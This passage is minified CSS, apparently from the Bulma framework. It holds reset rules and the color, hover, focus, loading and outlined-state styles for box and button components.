github.com/jgthms/minireset.css */html,body,p,ol,ul,li,dl,dt,dd,blockquote,figure,fieldset,legend,textarea,pre,iframe,hr,h1,h2,h3,h4,h5,h6{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:inherit}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,optgroup,select,textarea{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#485fc7;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#da1039;font-size:.875em;font-weight:400;padding:.25em .5em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:inherit}table th{color:#363636}@-webkit-keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;display:block;padding:1.25rem}a.box:hover,a.box:focus{box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #485fc7}a.box:active{box-shadow:inset 0 1px 2px #0a0a0a33,0 0 0 1px #485fc7}.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-small,.button .icon.is-medium,.button .icon.is-large{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button .icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button:hover,.button.is-hovered{border-color:#b5b5b5;color:#363636}.button:focus,.button.is-focused{border-color:#485fc7;color:#363636}.button:focus:not(:active),.button.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button:active,.button.is-active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text:hover,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text.is-focused{background-color:#f5f5f5;color:#363636}.button.is-text:active,.button.is-text.is-active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}.button.is-ghost{background:none;border-color:transparent;color:#485fc7;text-decoration:none}.button.is-ghost:hover,.button.is-ghost.is-hovered{color:#485fc7;text-decoration:underline}.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white:hover,.button.is-white.is-hovered{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white:focus,.button.is-white.is-focused{border-color:transparent;color:#0a0a0a}.button.is-white:focus:not(:active),.button.is-white.is-focused:not(:active){box-shadow:0 0 0 .125em #ffffff40}.button.is-white:active,.button.is-white.is-active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:#fff;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted:hover,.button.is-white.is-inverted.is-hovered{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined:hover,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined.is-focused{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading:after{border-color:transparent transparent white white!important}.button.is-white.is-outlined.is-loading:hover:after,.button.is-white.is-outlined.is-loading.is-hovered:after,.button.is-white.is-outlined.is-loading:focus:after,.button.is-white.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] .button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined:hover,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined.is-focused{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading:hover:after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-white.is-inverted.is-outlined.is-loading:focus:after,.button.is-white.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black:hover,.button.is-black.is-hovered{background-color:#040404;border-color:transparent;color:#fff}.button.is-black:focus,.button.is-black.is-focused{border-color:transparent;color:#fff}.button.is-black:focus:not(:active),.button.is-black.is-focused:not(:active){box-shadow:0 0 0 .125em #0a0a0a40}.button.is-black:active,.button.is-black.is-active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:#0a0a0a;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted:hover,.button.is-black.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined:hover,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined.is-focused{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading:hover:after,.button.is-black.is-outlined.is-loading.is-hovered:after,.button.is-black.is-outlined.is-loading:focus:after,.button.is-black.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined[disabled],fieldset[disabled] .button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined:hover,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined.is-focused{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading:hover:after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-black.is-inverted.is-outlined.is-loading:focus:after,.button.is-black.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.button.is-light:hover,.button.is-light.is-hovered{background-color:#eee;border-color:transparent;color:#000000b3}.button.is-light:focus,.button.is-light.is-focused{border-color:transparent;color:#000000b3}.button.is-light:focus:not(:active),.button.is-light.is-focused:not(:active){box-shadow:0 0 0 .125em #f5f5f540}.button.is-light:active,.button.is-light.is-active{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.button.is-light[disabled],fieldset[disabled] .button.is-light{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none}.button.is-light.is-inverted{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted:hover,.button.is-light.is-inverted.is-hovered{background-color:#000000b3}.button.is-light.is-inverted[disabled],fieldset[disabled] .button.is-light.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined:hover,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined.is-focused{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.button.is-light.is-outlined.is-loading:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-outlined.is-loading:hover:after,.button.is-light.is-outlined.is-loading.is-hovered:after,.button.is-light.is-outlined.is-loading:focus:after,.button.is-light.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-light.is-inverted.is-outlined:hover,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading:hover:after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-light.is-inverted.is-outlined.is-loading:focus:after,.button.is-light.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark:hover,.button.is-dark.is-hovered{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark:focus,.button.is-dark.is-focused{border-color:transparent;color:#fff}.button.is-dark:focus:not(:active),.button.is-dark.is-focused:not(:active){box-shadow:0 0 0 .125em #36363640}.button.is-dark:active,.button.is-dark.is-active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:#363636;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted:hover,.button.is-dark.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined:hover,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined.is-focused{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading:hover:after,.button.is-dark.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-outlined.is-loading:focus:after,.button.is-dark.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined:hover,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined.is-focused{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading:hover:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-inverted.is-outlined.is-loading:focus:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary:hover,.button.is-primary.is-hovered{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary:focus,.button.is-primary.is-focused{border-color:transparent;color:#fff}.button.is-primary:focus:not(:active),.button.is-primary.is-focused:not(:active){box-shadow:0 0 0 .125em #00d1b240}.button.is-primary:active,.button.is-primary.is-active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:#00d1b2;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted:hover,.button.is-primary.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] .button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined:hover,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined.is-focused{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading:hover:after,.button.is-primary.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-outlined.is-loading:focus:after,.button.is-primary.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined:hover,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined.is-focused{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading:hover:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-inverted.is-outlined.is-loading:focus:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light:hover,.button.is-primary.is-light.is-hovered{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light:active,.button.is-primary.is-light.is-active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#485fc7;border-color:transparent;color:#fff}.button.is-link:hover,.button.is-link.is-hovered{background-color:#3e56c4;border-color:transparent;color:#fff}.button.is-link:focus,.button.is-link.is-focused{border-color:transparent;color:#fff}.button.is-link:focus:not(:active),.button.is-link.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button.is-link:active,.button.is-link.is-active{background-color:#3a51bb;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#485fc7;border-color:#485fc7;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#485fc7}.button.is-link.is-inverted:hover,.button.is-link.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] .button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#485fc7}.button.is-link.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;color:#485fc7}.button.is-link.is-outlined:hover,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined.is-focused{background-color:#485fc7;border-color:#485fc7;color:#fff}.button.is-link.is-outlined.is-loading:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-outlined.is-loading:hover:after,.button.is-link.is-outlined.is-loading.is-hovered:after,.button.is-link.is-outlined.is-loading:focus:after,.button.is-link.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;box-shadow:none;color:#485fc7}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined:hover,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined.is-focused{background-color:#fff;color:#485fc7}.button.is-link.is-inverted.is-outlined.is-loading:hover:after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-link.is-inverted.is-outlined.is-loading:focus:after,.button.is-link.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eff1fa;color:#3850b7}.button.is-link.is-light:hover,.button.is-link.is-light.is-hovered{background-color:#e6e9f7;border-color:transparent;color:#3850b7}.button.is-link.is-light:active,.button.is-link.is-light.is-active{background-color:#dce0f4;border-color:transparent;color:#3850b7}.button.is-info{background-color:#3e8ed0;border-color:transparent;color:#fff}.button.is-info:hover,.button.is-info.is-hovered{background-color:#3488ce;border-color:transparent;color:#fff}.button.is-info:focus,.button.is-info.is-focused{border-color:transparent;color:#fff}.button.is-info:focus:not(:active),.button.is-info.is-focused:not(:active){box-shadow:0 0 0 .125em #3e8ed040}.button.is-info:active,.button.is-info.is-active{background-color:#3082c5;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3e8ed0;border-color:#3e8ed0;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted:hover,.button.is-info.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3e8ed0}.button.is-info.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;color:#3e8ed0}.button.is-info.is-outlined:hover,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined.is-focused{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.button.is-info.is-outlined.is-loading:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-outlined.is-loading:hover:after,.button.is-info.is-outlined.is-loading.is-hovered:after,.button.is-info.is-outlined.is-loading:focus:after,.button.is-info.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] .button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;box-shadow:none;color:#3e8ed0}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined:hover,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined.is-focused{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted.is-outlined.is-loading:hover:after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-info.is-inverted.is-outlined.is-loading:focus:after,.button.is-info.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eff5fb;color:#296fa8}.button.is-info.is-light:hover,.button.is-info.is-light.is-hovered{background-color:#e4eff9;border-color:transparent;color:#296fa8}.button.is-info.is-light:active,.button.is-info.is-light.is-active{background-color:#dae9f6;border-color:transparent;color:#296fa8}.button.is-success{background-color:#48c78e;border-color:transparent;color:#fff}.button.is-success:hover,.button.is-success.is-hovered{background-color:#3ec487;border-color:transparent;color:#fff}.button.is-success:focus,.button.is-success.is-focused{border-color:transparent;color:#fff}.button.is-success:focus:not(:active),.button.is-success.is-focused:not(:active){box-shadow:0 0 0 .125em #48c78e40}.button.is-success:active,.button.is-success.is-active{background-color:#3abb81;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] .button.is-success{background-color:#48c78e;border-color:#48c78e;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c78e}.button.is-success.is-inverted:hover,.button.is-success.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c78e}.button.is-success.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;color:#48c78e}.button.is-success.is-outlined:hover,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined.is-focused{background-color:#48c78e;border-color:#48c78e;color:#fff}.button.is-success.is-outlined.is-loading:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-outlined.is-loading:hover:after,.button.is-success.is-outlined.is-loading.is-hovered:after,.button.is-success.is-outlined.is-loading:focus:after,.button.is-success.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] .button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;box-shadow:none;color:#48c78e}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined:hover,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined.is-focused{background-color:#fff;color:#48c78e}.button.is-success.is-inverted.is-outlined.is-loading:hover:after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-success.is-inverted.is-outlined.is-loading:focus:after,.button.is-success.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf5;color:#257953}.button.is-success.is-light:hover,.button.is-success.is-light.is-hovered{background-color:#e6f7ef;border-color:transparent;color:#257953}.button.is-success.is-light:active,.button.is-success.is-light.is-active{background-color:#dcf4e9;border-color:transparent;color:#257953}.button.is-warning{background-color:#ffe08a;border-color:transparent;color:#000000b3}.button.is-warning:hover,.button.is-warning.is-hovered{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.button.is-warning:focus,.button.is-warning.is-focused{border-color:transparent;color:#000000b3}.button.is-warning:focus:not(:active),.button.is-warning.is-focused:not(:active){box-shadow:0 0 0 .125em #ffe08a40}.button.is-warning:active,.button.is-warning.is-active{background-color:#ffd970;border-color:transparent;color:#000000b3}.button.is-warning[disabled],fieldset[disabled] .button.is-warning{background-color:#ffe08a;border-color:#ffe08a;box-shadow:none}.button.is-warning.is-inverted{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted:hover,.button.is-warning.is-inverted.is-hovered{background-color:#000000b3}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#ffe08a}.button.is-warning.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;color:#ffe08a}.button.is-warning.is-outlined:hover,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined.is-focused{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.button.is-warning.is-outlined.is-loading:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-outlined.is-loading:hover:after,.button.is-warning.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-outlined.is-loading:focus:after,.button.is-warning.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;box-shadow:none;color:#ffe08a}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-warning.is-inverted.is-outlined:hover,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted.is-outlined.is-loading:hover:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-inverted.is-outlined.is-loading:focus:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-warning.is-light{background-color:#fffaeb;color:#946c00}.button.is-warning.is-light:hover,.button.is-warning.is-light.is-hovered{background-color:#fff6de;border-color:transparent;color:#946c00}.button.is-warning.is-light:active,.button.is-warning.is-light.is-active{background-color:#fff3d1;border-color:transparent;color:#946c00}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger:hover,.button.is-danger.is-hovered{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger:focus,.button.is-danger.is-focused{border-color:transparent;color:#fff}.button.is-danger:focus:not(:active),.button.is-danger.is-focused:not(:active){box-shadow:0 0 0 .125em #f1466840}.button.is-danger:active,.button.is-danger.is-active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] .button.is-danger{background-color:#f14668;border-color:#f14668;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted:hover,.button.is-danger.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined:hover,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined.is-focused{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading:hover:after,.button.is-danger.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-outlined.is-loading:focus:after,.button.is-danger.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined:hover,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined.is-focused{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading:hover:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-inverted.is-outlined.is-loading:focus:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] 